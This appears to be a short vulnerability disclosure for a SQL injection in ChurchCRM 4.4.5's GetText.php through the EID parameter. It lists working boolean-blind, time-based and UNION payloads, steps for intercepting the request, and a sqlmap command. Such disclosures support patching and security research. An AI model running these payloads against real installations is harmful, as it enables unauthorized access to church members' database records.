ChurchCRM 4.4.5 — SQL Injection at GetText.php

Vulnerability Explanation:

ChurchCRM 4.4.5 was discovered to contain a SQL injection vulnerability via the EID parameter at /churchcrm/GetText.php

Affected Component:

http://ip_address:port/churchcrm/GetText.php?EID=2

Payload:

Parameter: EID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: EID=2 AND 5131=5131
Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: EID=2 AND (SELECT 8794 FROM (SELECT(SLEEP(5)))vcYY)
Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: EID=-8266 UNION ALL SELECT CONCAT(0x716a626a71,0x4f4247535a686a694a597a48694d4e6c76515974547872624f6b4d6642564f764752694c7461526b,0x7176767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

Tested on:

1. ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

Steps to attack:

1. Login with an admin credential.

2. Go to the “Events” as shown in the picture and Click on the “List Church Events”

3. Click on Sermon Text.

4. We’ll found /churchcrm/GetText.php?EID=2.

5. Refresh pages again and intercept request with burp.

6.Create a text file with the content of the request.

7.Using sqlmap with our text file by the following the command below:

sqlmap -r GetText.req -p EID

8. We discovered SQL injection vulnerability via the EID parameter.